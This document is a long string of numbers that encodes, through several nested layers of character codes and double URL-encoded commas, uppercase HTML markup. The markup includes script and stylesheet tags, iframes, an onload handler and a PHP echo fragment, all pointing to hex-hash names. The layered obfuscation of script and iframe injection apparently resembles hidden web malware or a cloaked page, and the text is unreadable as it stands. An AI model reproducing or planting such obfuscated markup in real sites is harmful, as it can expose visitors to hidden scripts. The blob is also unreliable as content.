0,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49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4,37,50,53,50,67,56,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,55,51,37,50,53,50,67,57,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,50,53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4,37,50,53,50,67,55,51,37,50,53,50,67,55,56,37,50,53,50,67,55,53,37,50,53,50,67,51,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50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1,57,37,50,53,50,67,49,49,56,37,50,53,50,67,57,56,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,51,57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1,52,37,50,53,50,67,49,48,57,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,51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1,52,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57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7,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,52,57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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,54,54,37,50,53,50,67,54,53,37,50,53,50,67,54,55,37,50,53,50,67,55,53,37,50,53,50,67,55,49,37,50,53,50,67,56,50,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56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49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,57,57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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56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3,53,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55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3,51,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,49,37,50,53,50,67,53,57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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,49,37,50,53,50,67,53,57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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,51,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,55,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,55,